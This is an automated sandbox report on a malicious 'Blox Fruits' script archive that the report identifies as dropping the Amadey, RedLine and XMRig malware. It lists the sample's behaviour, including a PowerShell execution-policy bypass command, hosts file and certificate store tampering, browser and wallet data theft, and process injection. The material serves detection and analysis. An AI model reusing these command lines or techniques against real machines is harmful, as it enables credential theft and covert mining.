Malware Analysis Report

2025-08-06 00:06

Sample ID 240223-maewzsef4s
Target Blox_Fruits_Script.zip
SHA256 37ffba131c763e2630433b2865a8149508af32f387fb5808cfaf539815bb5077
Tags
amadey redline xmrig 11 discovery evasion infostealer miner persistence spyware stealer trojan
score
10/10

Analysis Overview

score
10/10

SHA256

37ffba131c763e2630433b2865a8149508af32f387fb5808cfaf539815bb5077

Threat Level: Known bad

The file Blox_Fruits_Script.zip was found to be: Known bad.

Malicious Activity Summary

amadey redline xmrig 11 discovery evasion infostealer miner persistence spyware stealer trojan

xmrig

Amadey

RedLine

RedLine payload

XMRig Miner payload

Drops file in Drivers directory

Creates new service(s)

Stops running service(s)

Checks BIOS information in registry

Reads user/profile data of web browsers

Accesses cryptocurrency files/wallets, possible credential harvesting

Legitimate hosting services abused for malware hosting/C2

Drops file in System32 directory

Suspicious use of SetThreadContext

Modifies system executable filetype association

Launches sc.exe

Checks installed software on the system

Executes dropped EXE

Program crash

Enumerates physical storage devices

Unsigned PE

Suspicious behavior: EnumeratesProcesses

Suspicious use of SetWindowsHookEx

Modifies system certificate store

Suspicious use of FindShellTrayWindow

Modifies registry class

Suspicious use of WriteProcessMemory

Modifies data under HKEY_USERS

Suspicious use of AdjustPrivilegeToken

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-02-23 10:17

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Analysis: behavioral14

Detonation Overview

Submitted

2024-02-23 10:15

Reported

2024-02-23 10:23

Platform

win10-20240221-en

Max time kernel

119s

Max time network

144s

Command Line

"C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\wget.exe"

Signatures

N/A

Processes

C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\wget.exe

"C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\wget.exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.8.0.8.0.8.0.8.0.ip6.arpa udp
US 8.8.8.8:53 11.227.111.52.in-addr.arpa udp
US 8.8.8.8:53 91.65.42.20.in-addr.arpa udp
US 8.8.8.8:53 189.178.17.96.in-addr.arpa udp

Files

memory/3732-0-0x0000000000400000-0x00000000008F2000-memory.dmp

Analysis: behavioral15

Detonation Overview

Submitted

2024-02-23 10:15

Reported

2024-02-23 10:22

Platform

win10-20240214-en

Max time kernel

117s

Max time network

129s

Command Line

powershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\data\AppInfo\vhXDYuQByxPS.ps1

Signatures

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 33 N/A C:\Windows\system32\AUDIODG.EXE N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\system32\AUDIODG.EXE N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\data\AppInfo\vhXDYuQByxPS.ps1

C:\Windows\system32\AUDIODG.EXE

C:\Windows\system32\AUDIODG.EXE 0x2bc

Network

Country Destination Domain Proto
US 8.8.8.8:53 43.229.111.52.in-addr.arpa udp
US 20.231.121.79:80 tcp
US 8.8.8.8:53 185.178.17.96.in-addr.arpa udp
US 8.8.8.8:53 9.179.89.13.in-addr.arpa udp

Files

memory/932-4-0x0000017472720000-0x0000017472742000-memory.dmp

memory/932-5-0x00007FFFF11C0000-0x00007FFFF1BAC000-memory.dmp

memory/932-6-0x000001745A270000-0x000001745A280000-memory.dmp

memory/932-7-0x000001745A270000-0x000001745A280000-memory.dmp

memory/932-10-0x00000174729D0000-0x0000017472A46000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_2nzzbxdd.cwl.ps1

MD5 c4ca4238a0b923820dcc509a6f75849b
SHA1 356a192b7913b04c54574d18c28d46e6395428ab
SHA256 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA512 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

memory/932-32-0x000001745A270000-0x000001745A280000-memory.dmp

memory/932-41-0x00007FFFF11C0000-0x00007FFFF1BAC000-memory.dmp

Analysis: behavioral16

Detonation Overview

Submitted

2024-02-23 10:15

Reported

2024-02-23 10:23

Platform

win10-20240221-en

Max time kernel

118s

Max time network

141s

Command Line

rundll32.exe C:\Users\Admin\AppData\Local\Temp\data\BLAKEX64.dll,#1

Signatures

N/A

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\data\BLAKEX64.dll,#1

Network

Country Destination Domain Proto
US 8.8.8.8:53 129.134.221.88.in-addr.arpa udp
US 8.8.8.8:53 48.229.111.52.in-addr.arpa udp
US 8.8.8.8:53 131.72.42.20.in-addr.arpa udp

Files

N/A

Analysis: behavioral2

Detonation Overview

Submitted

2024-02-23 10:15

Reported

2024-02-23 10:22

Platform

win10-20240221-en

Max time kernel

148s

Max time network

142s

Command Line

"C:\Users\Admin\AppData\Local\Temp\Launcher.exe"

Signatures

Amadey

trojan amadey

RedLine

infostealer redline

RedLine payload

Description Indicator Process Target
N/A N/A N/A N/A

xmrig

miner xmrig

XMRig Miner payload

miner

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Creates new service(s)

persistence

Drops file in Drivers directory

Description Indicator Process Target
File created C:\Windows\system32\drivers\etc\hosts C:\Users\Admin\AppData\Roaming\services\2plugin2901 N/A
File created C:\Windows\system32\drivers\etc\hosts C:\ProgramData\SystemFiles\csrss.exe N/A

Stops running service(s)

evasion

Checks BIOS information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Roaming\services\2plugin2901 N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Roaming\services\2plugin2901 N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\ProgramData\SystemFiles\csrss.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\ProgramData\SystemFiles\csrss.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Windows\system32\conhost.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Windows\system32\conhost.exe N/A

Reads user/profile data of web browsers

spyware stealer

Accesses cryptocurrency files/wallets, possible credential harvesting

spyware

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A raw.githubusercontent.com N/A N/A
N/A raw.githubusercontent.com N/A N/A
N/A raw.githubusercontent.com N/A N/A
N/A raw.githubusercontent.com N/A N/A

Drops file in System32 directory

Description Indicator Process Target
File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\system32\MRT.exe C:\ProgramData\SystemFiles\csrss.exe N/A
File opened for modification C:\Windows\system32\MRT.exe C:\Users\Admin\AppData\Roaming\services\2plugin2901 N/A
File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A

Checks installed software on the system

discovery

Launches sc.exe

Description Indicator Process Target
N/A N/A C:\Windows\system32\sc.exe N/A
N/A N/A C:\Windows\system32\sc.exe N/A
N/A N/A C:\Windows\system32\sc.exe N/A
N/A N/A C:\Windows\system32\sc.exe N/A

Enumerates physical storage devices

Program crash

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Roaming\services\plugin0222

Modifies data under HKEY_USERS

Description Indicator Process Target
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (data) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A

Modifies system certificate store

evasion spyware trojan

Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D69B561148F01C77C54578C10926DF5B856976AD C:\Users\Admin\AppData\Local\Temp\Launcher.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D69B561148F01C77C54578C10926DF5B856976AD\Blob = [blob data omitted] C:\Users\Admin\AppData\Local\Temp\Launcher.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D69B561148F01C77C54578C10926DF5B856976AD\Blob = [blob data omitted] C:\Users\Admin\AppData\Local\Temp\Launcher.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D69B561148F01C77C54578C10926DF5B856976AD\Blob = [blob data omitted] C:\Users\Admin\AppData\Local\Temp\Launcher.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D69B561148F01C77C54578C10926DF5B856976AD\Blob = [blob data omitted] C:\Users\Admin\AppData\Local\Temp\Launcher.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\services\2plugin2901 N/A
N/A N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\services\2plugin2901 N/A
N/A N/A C:\Users\Admin\AppData\Roaming\services\2plugin2901 N/A
N/A N/A C:\Users\Admin\AppData\Roaming\services\2plugin2901 N/A
N/A N/A C:\Users\Admin\AppData\Roaming\services\2plugin2901 N/A
N/A N/A C:\Users\Admin\AppData\Roaming\services\2plugin2901 N/A
N/A N/A C:\Users\Admin\AppData\Roaming\services\2plugin2901 N/A
N/A N/A C:\ProgramData\SystemFiles\csrss.exe N/A
N/A N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\ProgramData\SystemFiles\csrss.exe N/A
N/A N/A C:\ProgramData\SystemFiles\csrss.exe N/A
N/A N/A C:\ProgramData\SystemFiles\csrss.exe N/A
N/A N/A C:\Windows\system32\conhost.exe N/A
N/A N/A C:\Windows\system32\conhost.exe N/A
N/A N/A C:\Windows\system32\conhost.exe N/A
N/A N/A C:\Windows\system32\conhost.exe N/A
N/A N/A C:\Windows\system32\conhost.exe N/A
N/A N/A C:\Windows\system32\conhost.exe N/A
N/A N/A C:\Windows\system32\conhost.exe N/A
N/A N/A C:\Windows\system32\conhost.exe N/A
N/A N/A C:\Windows\system32\conhost.exe N/A
N/A N/A C:\Windows\system32\conhost.exe N/A
N/A N/A C:\Windows\system32\conhost.exe N/A
N/A N/A C:\Windows\system32\conhost.exe N/A
N/A N/A C:\Windows\system32\conhost.exe N/A
N/A N/A C:\Windows\system32\conhost.exe N/A
N/A N/A C:\Windows\system32\conhost.exe N/A
N/A N/A C:\Windows\system32\conhost.exe N/A
N/A N/A C:\Windows\system32\conhost.exe N/A
N/A N/A C:\Windows\system32\conhost.exe N/A
N/A N/A C:\Windows\system32\conhost.exe N/A
N/A N/A C:\Windows\system32\conhost.exe N/A
N/A N/A C:\Windows\system32\conhost.exe N/A
N/A N/A C:\Windows\system32\conhost.exe N/A
N/A N/A C:\Windows\system32\conhost.exe N/A
N/A N/A C:\Windows\system32\conhost.exe N/A
N/A N/A C:\Windows\system32\conhost.exe N/A
N/A N/A C:\Windows\system32\conhost.exe N/A
N/A N/A C:\Windows\system32\conhost.exe N/A
N/A N/A C:\Windows\system32\conhost.exe N/A
N/A N/A C:\Windows\system32\conhost.exe N/A
N/A N/A C:\Windows\system32\conhost.exe N/A
N/A N/A C:\Windows\system32\conhost.exe N/A
N/A N/A C:\Windows\system32\conhost.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\services\3plugin0222 N/A
N/A N/A C:\Windows\system32\conhost.exe N/A
N/A N/A C:\Windows\system32\conhost.exe N/A
N/A N/A C:\Windows\system32\conhost.exe N/A
N/A N/A C:\Windows\system32\conhost.exe N/A
N/A N/A C:\Windows\system32\conhost.exe N/A
N/A N/A C:\Windows\system32\conhost.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\services\3plugin0222 N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 33 N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 34 N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 35 N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 36 N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Windows\system32\conhost.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Roaming\services\3plugin0222 N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3064 wrote to memory of 4780 N/A C:\Users\Admin\AppData\Local\Temp\Launcher.exe C:\Users\Admin\AppData\Roaming\services\Launhcer.exe
PID 3064 wrote to memory of 4780 N/A C:\Users\Admin\AppData\Local\Temp\Launcher.exe C:\Users\Admin\AppData\Roaming\services\Launhcer.exe
PID 3064 wrote to memory of 4780 N/A C:\Users\Admin\AppData\Local\Temp\Launcher.exe C:\Users\Admin\AppData\Roaming\services\Launhcer.exe
PID 3064 wrote to memory of 4780 N/A C:\Users\Admin\AppData\Local\Temp\Launcher.exe C:\Users\Admin\AppData\Roaming\services\Launhcer.exe
PID 3064 wrote to memory of 4780 N/A C:\Users\Admin\AppData\Local\Temp\Launcher.exe C:\Users\Admin\AppData\Roaming\services\Launhcer.exe
PID 4780 wrote to memory of 3436 N/A C:\Users\Admin\AppData\Roaming\services\Launhcer.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4780 wrote to memory of 3436 N/A C:\Users\Admin\AppData\Roaming\services\Launhcer.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4780 wrote to memory of 3436 N/A C:\Users\Admin\AppData\Roaming\services\Launhcer.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3436 wrote to memory of 4388 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Roaming\services\data\Launcher.exe
PID 3436 wrote to memory of 4388 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Roaming\services\data\Launcher.exe
PID 3436 wrote to memory of 4388 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Roaming\services\data\Launcher.exe
PID 3436 wrote to memory of 4388 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Roaming\services\data\Launcher.exe
PID 3436 wrote to memory of 4388 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Roaming\services\data\Launcher.exe
PID 4388 wrote to memory of 4664 N/A C:\Users\Admin\AppData\Roaming\services\data\Launcher.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4388 wrote to memory of 4664 N/A C:\Users\Admin\AppData\Roaming\services\data\Launcher.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4388 wrote to memory of 4664 N/A C:\Users\Admin\AppData\Roaming\services\data\Launcher.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4388 wrote to memory of 2476 N/A C:\Users\Admin\AppData\Roaming\services\data\Launcher.exe C:\Users\Admin\AppData\Roaming\services\wget.exe
PID 4388 wrote to memory of 2476 N/A C:\Users\Admin\AppData\Roaming\services\data\Launcher.exe C:\Users\Admin\AppData\Roaming\services\wget.exe
PID 4388 wrote to memory of 2476 N/A C:\Users\Admin\AppData\Roaming\services\data\Launcher.exe C:\Users\Admin\AppData\Roaming\services\wget.exe
PID 4388 wrote to memory of 836 N/A C:\Users\Admin\AppData\Roaming\services\data\Launcher.exe C:\Users\Admin\AppData\Roaming\services\winrar.exe
PID 4388 wrote to memory of 836 N/A C:\Users\Admin\AppData\Roaming\services\data\Launcher.exe C:\Users\Admin\AppData\Roaming\services\winrar.exe
